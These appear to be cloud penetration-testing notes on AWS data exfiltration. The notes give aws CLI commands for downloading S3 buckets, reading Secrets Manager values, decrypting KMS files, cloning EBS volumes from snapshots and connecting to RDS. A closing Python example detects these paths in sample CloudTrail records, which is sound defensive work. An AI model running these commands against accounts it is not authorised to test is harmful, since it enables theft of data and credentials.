Data Exfiltration

- S3 Bucket Data Exfil

If the object is public, just enter its URL in the browser (virtual-hosted style: bucket, then s3, then region):

https://bucket-name.s3.region.amazonaws.com/secret.txt

If it is not public and we are an authenticated user:

aws s3api get-object --bucket <bucket-name> --key <object-key> <download-path>

We can also generate a time-limited presigned URL for an object and fetch it as if it were public (the URL is signed with our credentials; 604800 seconds, i.e. seven days, is the maximum S3 accepts):

aws s3 presign s3://<bucket-name>/<object-key> --expires-in 604800

We can also download the whole contents of a bucket with sync:

aws s3 ls s3://<bucket-name>/

aws s3 sync s3://<bucket-name> s3-files-dir

- Secrets Manager Data Exfil

If the user has access to Secrets Manager, they can decrypt and read the stored secrets.

To list policies attached to a user:

aws iam list-attached-user-policies --user-name <name>

To retrieve information about a specific version of a policy (Here we can see the permissions):

aws iam get-policy-version --policy-arn <arn> --version-id <id>

To list all secrets stored by AWS Secrets Manager:

aws secretsmanager list-secrets

To retrieve detailed information about a specific secret (here we get the KMS key ID, KmsKeyId, that protects the secret):

aws secretsmanager describe-secret --secret-id <name>

To get a resource-based policy attached to a specific secret:

aws secretsmanager get-resource-policy --secret-id <ID>

To retrieve the actual value of a secret:

aws secretsmanager get-secret-value --secret-id <ID>

KMS Operations (if we compromised, for example, an S3 bucket holding a KMS-encrypted file, we can decrypt it using the key stored in KMS, provided the key policy grants us kms:Decrypt):

To describe a specific KMS key:

aws kms describe-key --key-id <id>

To list the policy names attached to a specified key (used with the next command to see who can access the key, its description, and so on):

aws kms list-key-policies --key-id <ID>

To get the full policy document attached to a key (run this on all keys to see who can access them):

aws kms get-key-policy --policy-name <name> --key-id <ID>

To decrypt a file using the key (there is no need to specify the key, because for symmetric KMS keys its ID is embedded in the ciphertext metadata; the query key is case-sensitive and the result is base64-encoded, so decode it):

aws kms decrypt --ciphertext-blob fileb://EncryptedFile --output text --query Plaintext | base64 --decode

- Volume from Snapshot Data Exfil

If we have IAM permissions on EC2, we can create a snapshot of an EC2 instance's volume, create a new volume from that snapshot and attach it to another EC2 instance.

Maybe we don't have the right to access the instance itself, but we do have the rights to create a snapshot and attach the resulting volume to another machine.

First, create a snapshot of a specified volume:

aws ec2 create-snapshot --volume-id <volume-id> --description "Example" --profile <profile-name>

List snapshots:

aws ec2 describe-snapshots

Create a volume from the snapshot (it needs to be in the same availability zone as the instance we have access to):

aws ec2 create-volume --snapshot-id <snapshot-id> --availability-zone <zone> --profile <profile-name>

Attach the volume to an instance (the device name can be another free one, e.g. /dev/sdg):

aws ec2 attach-volume --volume-id <volume-id> --instance-id <instance-id> --device /dev/sdf

Finally, on the instance, mount the volume (the guest may expose it under a different name such as /dev/xvdf or /dev/nvme1n1; check with lsblk):

lsblk

sudo mount /dev/xvdf /directory

- RDS Data Exfil

! If the RDS instance is not reachable from outside (its security group or VPC restricts access), we first need to compromise a host inside that network to reach the database.

List instances in RDS:

aws rds describe-db-instances

List information about the specified security group:

aws ec2 describe-security-groups --group-ids <id>

For password-based authentication (-p without a value prompts for the password; "-p password" would be parsed as a database name):

mysql -h <hostname> -P <port> -u <user> -p

For IAM-based authentication, first identify which identity we are using:

aws sts get-caller-identity

Second, list all policies attached to a role:

aws iam list-attached-role-policies --role-name <name>

Third, get information about a specific version of a policy:

aws iam get-policy-version --policy-arn <arn> --version-id <id>

Then, get a temporary authentication token for RDS (it is valid for 15 minutes):

aws rds generate-db-auth-token --hostname <hostname> --port <port> --username <username> --region <region>

We can put it in a variable:

TOKEN=$(aws rds generate-db-auth-token --hostname <hostname> --port <port> --username <username> --region <region>)

Finally, connect to the DB using the token (IAM authentication requires a TLS connection, and the token is sent via the cleartext plugin):

mysql -h <hostname> -P <port> --user=<username> --ssl-mode=REQUIRED --enable-cleartext-plugin --password="$TOKEN"
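From the defender's side, the paths above leave a recognisable trail. The following is an added example, not part of these notes: a small Python triage over constructed CloudTrail-shaped records that flags bulk GetSecretValue reads, the CreateSnapshot -> CreateVolume -> AttachVolume chain, and S3 GetObject calls authenticated by a presigned URL (S3 data events record these with AuthenticationMethod = QueryString, so data-event logging must be on). Assumptions: field names follow the CloudTrail/S3 data-event shape; "aws s3 presign" and "aws rds generate-db-auth-token" are client-side signing operations and produce no CloudTrail event of their own, so only the later GetObject or database login is observable.

```python
from collections import defaultdict

ACTOR = "arn:aws:iam::111122223333:user/dev"  # constructed sample principal
def ev(source, name, req=None, resp=None, extra=None, actor=ACTOR):
    """Build a minimal CloudTrail-shaped record (constructed sample data)."""
    return {"eventSource": source, "eventName": name, "userIdentity": {"arn": actor},
            "requestParameters": req or {}, "responseElements": resp or {},
            "additionalEventData": extra or {}}

# Constructed sample trail reproducing the paths above; no real account data.
SAMPLE = [
    ev("secretsmanager.amazonaws.com", "ListSecrets"),
    ev("secretsmanager.amazonaws.com", "GetSecretValue", {"secretId": "prod/db"}),
    ev("secretsmanager.amazonaws.com", "GetSecretValue", {"secretId": "prod/api"}),
    ev("secretsmanager.amazonaws.com", "GetSecretValue", {"secretId": "prod/smtp"}),
    ev("ec2.amazonaws.com", "CreateSnapshot", {"volumeId": "vol-0a"}, {"snapshotId": "snap-01"}),
    ev("ec2.amazonaws.com", "CreateVolume", {"snapshotId": "snap-01"}, {"volumeId": "vol-0b"}),
    ev("ec2.amazonaws.com", "AttachVolume", {"volumeId": "vol-0b", "instanceId": "i-0999"}),
    # S3 data event: a presigned-URL download is authenticated via the query string.
    ev("s3.amazonaws.com", "GetObject", {"bucketName": "corp-data", "key": "secret.txt"},
       extra={"AuthenticationMethod": "QueryString"}),
]

def detect(events, secret_threshold=3):
    """Return (actor, rule, detail) findings for the exfil paths on this page."""
    findings, secrets_read = [], defaultdict(set)  # actor -> distinct secretIds read
    snapshots, cloned = set(), {}  # snapshots seen; volumeId built from one -> snapshotId
    for e in events:
        actor, name = e["userIdentity"]["arn"], e["eventName"]
        req, resp = e["requestParameters"], e["responseElements"]
        if name == "GetSecretValue":
            secrets_read[actor].add(req.get("secretId"))
        elif name == "CreateSnapshot":
            snapshots.add(resp.get("snapshotId"))
        elif name == "CreateVolume" and req.get("snapshotId") in snapshots:
            cloned[resp.get("volumeId")] = req["snapshotId"]
        elif name == "AttachVolume" and req.get("volumeId") in cloned:
            # Snapshot -> new volume -> attached elsewhere: the volume exfil chain above.
            findings.append((actor, "snapshot-clone-attach",
                             f"{cloned[req['volumeId']]} -> {req['volumeId']} -> {req.get('instanceId')}"))
        elif name == "GetObject" and e["additionalEventData"].get("AuthenticationMethod") == "QueryString":
            findings.append((actor, "presigned-url-read", f"s3://{req.get('bucketName')}/{req.get('key')}"))
    for actor, ids in secrets_read.items():
        if len(ids) >= secret_threshold:
            findings.append((actor, "bulk-secret-read", f"{len(ids)} distinct secrets"))
    return findings

if __name__ == "__main__":
    for finding in detect(SAMPLE):
        print(" | ".join(finding))
```

In a real pipeline the records would come from CloudTrail Lake or the S3 log bucket; the threshold and the instance the volume lands on (a host the principal does not normally touch) are what separate these from routine administration.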
